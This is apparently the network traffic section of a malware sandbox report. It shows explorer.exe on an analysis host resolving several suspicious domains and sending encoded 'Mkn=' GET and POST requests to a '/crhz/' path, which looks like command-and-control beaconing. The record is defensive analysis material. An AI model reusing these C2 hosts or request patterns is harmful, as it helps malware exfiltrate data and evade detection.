Jan 25, 2023 13:22:57.240020037 CET	80	49719	76.223.105.230	192.168.2.3
Jan 25, 2023 13:23:02.261033058 CET	49720	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:02.281230927 CET	80	49720	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:02.281434059 CET	49720	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:02.281580925 CET	49720	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:02.301817894 CET	80	49720	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:02.302560091 CET	80	49720	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:02.302602053 CET	80	49720	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:02.302756071 CET	49720	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:03.799160004 CET	49720	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:04.811568022 CET	49721	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:04.831151962 CET	80	49721	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:04.831336021 CET	49721	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:04.831597090 CET	49721	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:04.851166964 CET	80	49721	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:04.851221085 CET	80	49721	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:04.851268053 CET	80	49721	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:04.852343082 CET	80	49721	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:04.852396011 CET	80	49721	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:04.852515936 CET	49721	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:06.342140913 CET	49721	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:07.358375072 CET	49722	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:07.379038095 CET	80	49722	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:07.379273891 CET	49722	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:07.379401922 CET	49722	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:07.400788069 CET	80	49722	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:07.400816917 CET	80	49722	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:07.400836945 CET	80	49722	81.169.145.72	192.168.2.3
Jan 25, 2023 13:23:07.401047945 CET	49722	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:07.401205063 CET	49722	80	192.168.2.3	81.169.145.72
Jan 25, 2023 13:23:07.421442986 CET	80	49722	81.169.145.72	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 13:21:49.982531071 CET	58921	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:21:50.025445938 CET	53	58921	8.8.8.8	192.168.2.3
Jan 25, 2023 13:21:55.104695082 CET	49977	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:21:55.240637064 CET	53	49977	8.8.8.8	192.168.2.3
Jan 25, 2023 13:22:07.554193020 CET	57840	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:22:07.854789972 CET	53	57840	8.8.8.8	192.168.2.3
Jan 25, 2023 13:22:18.762468100 CET	57990	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:22:18.788235903 CET	53	57990	8.8.8.8	192.168.2.3
Jan 25, 2023 13:22:29.688579082 CET	52387	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:22:29.709445953 CET	53	52387	8.8.8.8	192.168.2.3
Jan 25, 2023 13:22:40.618750095 CET	56924	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:22:40.749403000 CET	53	56924	8.8.8.8	192.168.2.3
Jan 25, 2023 13:22:52.058613062 CET	60625	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:22:52.080414057 CET	53	60625	8.8.8.8	192.168.2.3
Jan 25, 2023 13:23:02.235137939 CET	49302	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:23:02.259918928 CET	53	49302	8.8.8.8	192.168.2.3
Jan 25, 2023 13:23:12.426903009 CET	53975	53	192.168.2.3	8.8.8.8
Jan 25, 2023 13:23:13.114150047 CET	53	53975	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 25, 2023 13:21:49.982531071 CET	192.168.2.3	8.8.8.8	0xfe1d	Standard query (0)	www.laylaroseuk.com	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:21:55.104695082 CET	192.168.2.3	8.8.8.8	0x7e2e	Standard query (0)	www.n-r-eng.com	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:07.554193020 CET	192.168.2.3	8.8.8.8	0x268f	Standard query (0)	www.sandpiper-apts.com	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:18.762468100 CET	192.168.2.3	8.8.8.8	0x8ae7	Standard query (0)	www.tf8dangky.online	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:29.688579082 CET	192.168.2.3	8.8.8.8	0x2f88	Standard query (0)	www.teammart.online	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:40.618750095 CET	192.168.2.3	8.8.8.8	0xca24	Standard query (0)	www.suachuadienlanh247.com	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:52.058613062 CET	192.168.2.3	8.8.8.8	0xff47	Standard query (0)	www.hvlandscapes.biz	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:23:02.235137939 CET	192.168.2.3	8.8.8.8	0xcd46	Standard query (0)	www.frogair.online	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:23:12.426903009 CET	192.168.2.3	8.8.8.8	0x8e1b	Standard query (0)	www.mitsubangsaen.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 25, 2023 13:21:50.025445938 CET	8.8.8.8	192.168.2.3	0xfe1d	No error (0)	www.laylaroseuk.com	laylaroseuk.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 25, 2023 13:21:50.025445938 CET	8.8.8.8	192.168.2.3	0xfe1d	No error (0)	laylaroseuk.com		2.57.90.16	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:21:55.240637064 CET	8.8.8.8	192.168.2.3	0x7e2e	No error (0)	www.n-r-eng.com		185.151.199.52	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:07.854789972 CET	8.8.8.8	192.168.2.3	0x268f	No error (0)	www.sandpiper-apts.com		164.88.201.214	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:18.788235903 CET	8.8.8.8	192.168.2.3	0x8ae7	No error (0)	www.tf8dangky.online	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 25, 2023 13:22:18.788235903 CET	8.8.8.8	192.168.2.3	0x8ae7	No error (0)	dns.ladipage.com	ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 25, 2023 13:22:18.788235903 CET	8.8.8.8	192.168.2.3	0x8ae7	No error (0)	ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com		18.138.206.213	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:18.788235903 CET	8.8.8.8	192.168.2.3	0x8ae7	No error (0)	ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com		18.142.208.246	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:29.709445953 CET	8.8.8.8	192.168.2.3	0x2f88	No error (0)	www.teammart.online		184.94.215.91	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:40.749403000 CET	8.8.8.8	192.168.2.3	0xca24	No error (0)	www.suachuadienlanh247.com		103.221.223.104	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:52.080414057 CET	8.8.8.8	192.168.2.3	0xff47	No error (0)	www.hvlandscapes.biz	hvlandscapes.biz		CNAME (Canonical name)	IN (0x0001)	false
Jan 25, 2023 13:22:52.080414057 CET	8.8.8.8	192.168.2.3	0xff47	No error (0)	hvlandscapes.biz		76.223.105.230	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:22:52.080414057 CET	8.8.8.8	192.168.2.3	0xff47	No error (0)	hvlandscapes.biz		13.248.243.5	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:23:02.259918928 CET	8.8.8.8	192.168.2.3	0xcd46	No error (0)	www.frogair.online	frogair.online		CNAME (Canonical name)	IN (0x0001)	false
Jan 25, 2023 13:23:02.259918928 CET	8.8.8.8	192.168.2.3	0xcd46	No error (0)	frogair.online		81.169.145.72	A (IP address)	IN (0x0001)	false
Jan 25, 2023 13:23:13.114150047 CET	8.8.8.8	192.168.2.3	0x8e1b	No error (0)	www.mitsubangsaen.online	cname.u01.df.bkk1.cloud.z.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 25, 2023 13:23:13.114150047 CET	8.8.8.8	192.168.2.3	0x8e1b	No error (0)	cname.u01.df.bkk1.cloud.z.com		163.44.198.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.laylaroseuk.com

www.n-r-eng.com

www.sandpiper-apts.com

www.tf8dangky.online

www.teammart.online

www.suachuadienlanh247.com

www.hvlandscapes.biz

www.frogair.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49700	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:21:50.067547083 CET	102	OUT	GET /crhz/?Mkn=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5xHn8QLAS8Zm4ynQ==&vux=DmStydFUWc8HD HTTP/1.1 Host: www.laylaroseuk.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2023 13:21:50.100114107 CET	102	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 25 Jan 2023 12:21:50 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49702	185.151.199.52	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:21:55.314254999 CET	114	OUT	POST /crhz/ HTTP/1.1 Host: www.n-r-eng.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.n-r-eng.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.n-r-eng.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 7a 4a 7e 67 54 63 42 5a 72 74 71 51 71 69 6c 78 30 71 32 37 34 4f 41 5a 70 71 68 55 41 6c 45 6c 4c 75 42 39 45 6c 43 64 67 4b 64 69 48 48 68 68 6e 6b 45 4f 56 61 71 65 4b 75 4e 59 71 48 42 5a 52 46 38 72 48 33 6d 79 7a 2d 41 30 47 52 75 67 38 4b 46 32 59 5a 38 4b 42 36 73 33 42 31 51 4a 46 41 7a 79 35 36 58 2d 77 4e 67 31 74 4f 73 50 6b 39 43 39 75 53 6d 58 73 70 6b 36 49 77 6c 73 5a 52 42 47 4c 45 4a 42 75 75 49 31 79 5a 46 37 44 46 54 4d 4c 5a 49 44 43 5f 71 4d 44 41 72 77 6a 36 73 5f 52 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mkn=D0VHMBBMIqAyzJ~gTcBZrtqQqilx0q274OAZpqhUAlElLuB9ElCdgKdiHHhhnkEOVaqeKuNYqHBZRF8rH3myz-A0GRug8KF2YZ8KB6s3B1QJFAzy56X-wNg1tOsPk9C9uSmXspk6IwlsZRBGLEJBuuI1yZF7DFTMLZIDC_qMDArwj6s_Rw).
Jan 25, 2023 13:21:56.579690933 CET	116	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 25 Jan 2023 12:21:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 18399 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://n-r-eng.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd eb 76 e3 c6 b1 30 fa db f3 14 18 ce ce 8c 14 13 10 ae bc 48 a3 71 62 c7 ce f6 39 be 2d db 49 be 6f 79 bc b4 40 a0 49 62 04 02 0c 00 ea 32 1a ad 75 de e0 38 b1 bd 93 ac 64 67 27 59 f9 76 bc fd 42 fa 7f 9e e4 54 55 37 80 06 09 f0 22 71 6e b6 c6 16 09 76 57 57 55 57 57 57 55 5f f1 f0 ae 1f 7b d9 f9 94 29 e3 6c 12 3e ba f3 10 bf 14 3f 48 0e 5b 49 16 b6 94 d0 8d 46 87 ad 31 53 df ff a0 85 b9 cc f5 1f dd 79 e3 e1 84 65 ae e2 8d dd 24 65 d9 61 eb 57 9f bf a7 f6 20 fb 0d 91 11 b9 13 76 d8 3a 09 d8 e9 34 4e b2 96 e2 c5 51 c6 22 00 3c 0d fc 6c 7c e8 b3 93 c0 63 2a fd 68 2b 41 14 64 81 1b aa a9 e7 86 ec d0 40 34 0f c3 20 3a 56 12 16 1e b6 a6 49 3c 0c 42 d6 52 c6 09 1b 02 23 59 36 4d f7 f7 f6 46 93 e9 48 8b 93 d1 de d9 30 da 33 78 a1 92 f4 83 24 1e c4 59 fa a0 20 fc 20 8a 83 c8 67 67 6d 65 18 87 61 7c fa 40 d9 7b 74 07 8a dc 55 55 e5 f3 71 90 2a 69 90 31 05 be e3 69 16 4c 82 a7 cc 57 4e 83 6c ac 64 63 a6 fc ef d8 4d 33 e5 b3 77 3f 56 a6 e1 6c 14 44 ca 89 a9 6b ba a2 2a 39 2f e7 08 a0 79 f1 64 ef 34 4e fc 69 c2 d2 74 8f 83 a6 7b 29 8b f7 14 55 45 f6 b2 20 0b d9 a3 4f dc 11 53 a2 38 03 46 66 91 0f 58 3e 52 3f 55 df 8d 46 0f f7 78 7e 5e 0f a8 f7 94 25 d9 f9 61 2b 1e ed 87 31 ca 46 92 e3 98 1d 41 7b 60 25 ea c0 09 93 04 dd 44 b3 11 01 4a e3 08 25 29 21 a9 96 49 bd 24 98 66 0a 2a ce 61 cb 9d 4e c3 c0 73 b3 20 8e f6 42 ff cd 27 69 1c 41 c1 d0 4d d3 c3 16 09 07 da 76 cc 26 ae 3a 4a dc e9 b8 f5 e8 a2 f5 33 42 7b 96 b5 f6 8b 16 e5 20 d8 a6 ad 76 eb 67 1c 72 ff 0b 00 45 1a 00 f7 1b 36 f8 0c d8 c2 cc c0 97 ca 45 6a a2 b2 68 44 f2 bf 77 ca 06 29 07 9a 25 61 03 10 64 52 d5 f6 8b 2a b5 5b 3e e3 15 82 1a 40 fa d5 df b4 ab ef 94 ab 6f ae fe 76 f5 f5 d5 df af be 51 ae 7e 07 8f 7f c2 87 6f e1 eb 3f ae fe 0a df df 63 ea 3f ee ff 76 16 67 07 57 7f 05 1c d3 d9 20 0c d2 31 4b 5a fb 17 cb 78 84 1a ba 51 f0 94 c4 d5 ba 84 72 31 0a 18 7a c0 cf 3d 4e 5f aa f4 67 cc 4d bc b1 c8 68 b7 32 37 19 b1 8c f0 0b 80 77 a3 2c 39 ff 04 94 3b e3 75 fe 9c 4d a6 a1 9b b1 06 e2 6f a5 87 17 29 e1 3c ca 58 32 39 4a b3 24 88 46 97 c8 c6 6f 67 2c 39 57 83 68 3a c3 56 49 d8 6f 67 41 02 dd 80 fa d3 62 91 d6 e5 97 ed 56 10 7d 00 d6 61 06 da 85 e4 c8 44 5c b6 4b de 3e 96 2b ba b4 d9 e2 2a e4 42 f3 2c 6d cc 30 1e c5 b2 48 de 9f 00 43 1f 0f 9e 30 0f 65 52 c3 e3 52 56 84 1e ee 21 d6 bd 00 51 ed 2d 65 e0 74 aa 8a 2e b2 37 9b 86 b1 eb a7 7b a6 6e 5a 7b ba b1 f7 9b b1 9b a5 3f 9f 4e 55 e2 48 c5 64 55 37 54 dd 56 dd 4c 35 4c cd d1 35 cb 51 4d 95 19 9d ae 6d 75 bb 5d a7 63 59 96 f6 64 ca b0 ce 02 eb af 5e 3c 65 b2 cb ad fd 9e 65 b5 41 62 c1 68 9c 89 1f 9e 9b f7 90 bc 69 40 6f 48 46 2b 54 be 4e a8 97 97 5f 5e 3e dc e3 dd ee 91 30 c5 7b 0b c6 56 23 e3 79 e7 4e e9 11 1e f8 51 aa 82 91 1d b2 cc 1b 3f e0 6e e1 41 85 1e 19 Data Ascii: v0Hqb9-Ioy@Ib2u8dg'YvBTU7"qnvWWUWWWU_{)l>?H[IF1Sye$eaW v:4NQ"<l\|ch+Ad@4 :VI<BR#Y6MFH03x$Y ggmea\|@{tUUqi1iLWNldcM3w?VlDk9/yd4Nit{)UE OS8FfX>R?UFx~^%a+1FA{`%DJ%)!I$faNs B'iAMv&:J3B{ vgrE6EjhDw)%adR[>@ovQ~o?c?vgW 1KZxQr1z=N_gMh27w,9;uMo)<X29J$Fog,9Wh:VIogAbV}aD\K>+B,m0HC0eRRV!Q-et.7{nZ{?NUHdU7TVL5L5QMmu]cYd^<eeAbhi@oHF+TN_^>0{V#yNQ?nA
Jan 25, 2023 13:21:56.579727888 CET	117	IN	Data Raw: 77 5e 80 e7 e6 3c 0d 41 5c a9 36 4a 33 50 34 8f 43 7a 49 9c a6 71 12 a0 5d 27 ec 80 19 a4 1a 81 f2 48 68 c8 13 b9 21 e8 7f 84 7d ab c6 ec 25 69 fa e6 d9 04 fc 25 d9 de c2 5a 2a f7 43 17 2c c4 81 72 f5 4f 30 1c 5f ff 7f ff cf ff 3b ef c8 64 39 0d Data Ascii: w^<A\6J3P4CzIq]'Hh!}%i%Z*C,rO0_;d9Z'\}{0YCJ23iv)4PtM?$~(w>xs`)w~71}pA9gj:v.+bI54&}1]=U7FtuM];\FR
Jan 25, 2023 13:21:56.579752922 CET	118	IN	Data Raw: d7 7d 3e b4 56 c5 f8 34 9f 6d a3 ae bf 7b f0 bc 9b 1d b8 61 6b b1 85 80 82 a7 1a 7d 65 67 17 c5 dc 0c fe 6a 80 c1 0f f5 34 c1 6e 8b 9f 07 c4 82 0a e3 e1 09 44 0a bc dd ea 4b 02 bf 3f bd 28 e6 5d 4a 8b 50 4c 76 c0 40 6e 36 89 d2 7a 13 41 0a aa 8d Data Ascii: }>V4m{ak}egj4nDK?(]JPLv@n6zA>w+%`5lb`M<\|b,&Wm=eWkukb+(1krb(5)RxE0R^#:Kp"kYm5n}=[r[P"h
Jan 25, 2023 13:21:56.579777956 CET	120	IN	Data Raw: b5 4d cf 6a b3 73 d2 ef bd 87 67 9e aa 73 10 8b f5 be 50 b2 78 ba 8f 7b a9 ab e8 36 14 69 6d 6b 5d af 75 96 88 5b 09 83 86 2c c5 dd b4 51 a7 75 ba 87 5d f3 42 c9 f9 b7 e8 df 0b e2 5f 73 bd 2c 38 61 9b a9 fd cf c8 f2 2b 3b d2 0e c0 6e a7 3b 3d db Data Ascii: MjsgsPx{6imk]u[,Qu]B_s,8a+;n;=U.!kkRgz$#~mbp3GJ[yfUy3-\|93TrA\|kKbr{!,T`T'n+,'2rd.\|Hg;==N-0
Jan 25, 2023 13:21:56.579802990 CET	121	IN	Data Raw: 15 99 d6 54 e1 25 c9 76 fb 82 f2 f0 d4 d4 56 a4 94 ce 22 55 79 2f 09 f6 95 de be 8e 6f 06 31 f0 7b 01 9d 2c 98 87 7b b3 50 d8 aa 3d 30 56 0b 8f e5 b3 9c ff 82 3c a2 a1 7b a6 67 77 65 8f 58 4d 7a f5 3c a2 09 b1 b9 63 0f 4d 05 47 f5 78 46 9a dc 16 Data Ascii: T%vV"Uy/o1{,{P=0V<{gweXMz<cMGxF).xtNJM%^-=\|'n-<PQw(?- E~{3\YPrH<7_.'ud69g>72S\'l"jQ(#}~u.Lv(1OD
Jan 25, 2023 13:21:56.579828024 CET	122	IN	Data Raw: 75 34 08 dd e8 b8 5c e9 ad af 8a d8 3b 10 47 e1 79 eb d1 6f 04 07 d5 19 f1 87 41 39 21 3f c0 09 f9 9c 51 69 4e be 58 59 98 9b 4c 7f a1 02 a4 25 2a d5 ad 2c ba 57 25 d8 35 07 5e df 36 5b f5 8b 68 37 11 dd 27 39 ed 66 d9 95 cb 68 08 f7 aa 09 0f 97 Data Ascii: u4\;GyoA9!?QiNXYL%*,W%5^6[h7'9fh,<ngxvA~B+Ypj,_qo7nsI@Z^6J;>\|j@H@}!<?$>I89^c!T7yidu{j3KwN)
Jan 25, 2023 13:21:56.579849958 CET	124	IN	Data Raw: bf 59 34 7e 60 12 41 12 df be 08 5b 67 eb eb 08 63 20 39 6c 63 a1 f9 2b b1 8e 2e 29 fe ba 63 8b 3f 83 a3 fd 1d 57 00 8c 60 be 82 bf ef aa 2e 75 cb 95 5e 67 d4 50 51 e1 9e 5a 36 7b 1e f9 2d a9 10 2a 30 0c 1d ff 85 b1 d9 5c 2b d2 9c 28 98 e4 a5 53 Data Ascii: Y4~`A[gc 9lc+.)c?W`.u^gPQZ6{-0\+(S{yoA33i;?w=LG.n8azkY\|mG4&!w&\|sd0NC:`EZ+,b}iVMkIxDH5Y&9+b
Jan 25, 2023 13:21:56.579874039 CET	125	IN	Data Raw: ee 4e 5f b7 a4 68 65 fe 5e 21 9a 90 dc 86 fc ae d9 96 a2 01 37 29 c2 a5 27 0a 4a 37 ae 50 7d 0e 32 7c 3b 1b d7 33 3e 9f a1 19 a9 82 c2 72 93 15 6d ba 3f 0c 92 e2 76 f2 5c 48 f4 f6 3f 7d 55 c9 d0 5d 28 c8 a5 bb aa a4 8a 77 78 66 30 76 8c 5c 0f bb Data Ascii: N_he^!7)'J7P}2\|;3>rm?v\H?}U](wxf0v\aA"s.=oST)s.R8qK5Wo7,ps-\O-xn"$Fz,m54R`yy[Vd;SVyml&,mnF
Jan 25, 2023 13:21:56.579896927 CET	126	IN	Data Raw: 99 08 1e c5 26 36 2a 5c d3 4e 02 6a a1 a1 e6 5e 30 b3 78 6f 7e fd fe 46 11 69 d3 9b 0a e7 f6 ee 89 20 ba ba e7 72 e5 ae 4b ba b1 3b 8c a3 91 ea 26 f8 3e 6e 37 cc 38 66 79 fb 65 c5 2e cc ef c4 5c 83 6b 29 be a7 13 c2 7f b9 fa c3 dd 5a 44 73 2f c1 Data Ascii: &6*\Nj^0xo~Fi rK;&>n78fye.\k)ZDs/BvJlm\|;2-B5tVibgaLWiiS=BIUa?MXS+x:l1'o>&EpeW/iowV]qU= N[}__6
Jan 25, 2023 13:21:56.579921007 CET	128	IN	Data Raw: 03 6d 72 7e 3a c5 b7 9d 43 6f d7 82 70 0f 57 e6 12 20 7e d8 3a 1a 84 6e 74 dc e2 c3 dc 28 1e c6 78 7a 97 96 66 bf e2 37 db fc 8d f6 6d 7d a3 5c fd a3 75 f5 27 e5 33 c2 a8 fc 86 0d f8 fa dd 92 97 4b dd 74 d0 73 33 85 ed 0c f5 4e a7 f2 b2 b2 6a ca Data Ascii: mr~:CopW ~:nt(xzf7m}\u'3Kts3Nj^7}7BO014ax_MEBr]Zy;ob\~\Fj %EV.`IC41fFOR;Y4K/k
Jan 25, 2023 13:21:56.650919914 CET	129	IN	Data Raw: 20 e2 e8 df f1 3a c2 5f 30 bc 90 70 bf 65 e8 3a 24 e2 dd 4d 9f 83 bf cf 70 61 6d bf 65 b5 2e 37 6d ed 3c 0e 95 cc 27 04 b8 0b 51 29 de 5b 9b 47 0a 87 87 d8 9d 20 ec f8 ec 7c 32 88 43 e8 0d 29 3d cc 67 68 50 27 7a 7f c3 5b 05 6e 56 18 42 01 c9 2e Data Ascii: :_0pe:$Mpame.7m<'Q)[G \|2C)=ghP'z[nVB.k2l&c"RNV~Ajc`2\| \|fysp}}yAr0KBBNAMRR#J6KVcV+H^$21 :d'aVd<QS@$~DIzC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49711	184.94.215.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:29.887149096 CET	181	OUT	POST /crhz/ HTTP/1.1 Host: www.teammart.online Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.teammart.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.teammart.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 36 33 74 4b 71 42 6e 31 47 51 57 68 49 5f 64 69 55 54 6a 6e 78 2d 77 38 69 4b 78 78 78 6b 33 36 45 41 6c 41 7a 76 36 57 50 4f 43 48 61 57 59 6d 55 62 69 5a 54 4b 51 74 7e 53 31 4f 71 68 4a 72 7a 77 49 38 54 63 31 33 4a 50 44 75 59 33 44 30 6c 68 66 37 48 34 5a 75 71 7a 76 54 69 64 4a 35 78 41 48 51 75 71 52 6b 35 54 68 31 6a 65 31 67 4a 67 49 78 42 49 32 70 4a 70 62 71 47 57 6a 76 65 69 76 4e 35 49 6c 75 45 2d 5a 76 59 50 73 63 75 71 6e 34 45 72 68 61 33 51 36 5a 4c 32 7a 50 47 4f 52 54 67 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mkn=1bSqDFR5OvcN63tKqBn1GQWhI_diUTjnx-w8iKxxxk36EAlAzv6WPOCHaWYmUbiZTKQt~S1OqhJrzwI8Tc13JPDuY3D0lhf7H4ZuqzvTidJ5xAHQuqRk5Th1je1gJgIxBI2pJpbqGWjveivN5IluE-ZvYPscuqn4Erha3Q6ZL2zPGORTgw).
Jan 25, 2023 13:22:30.155711889 CET	182	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 12:22:29 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 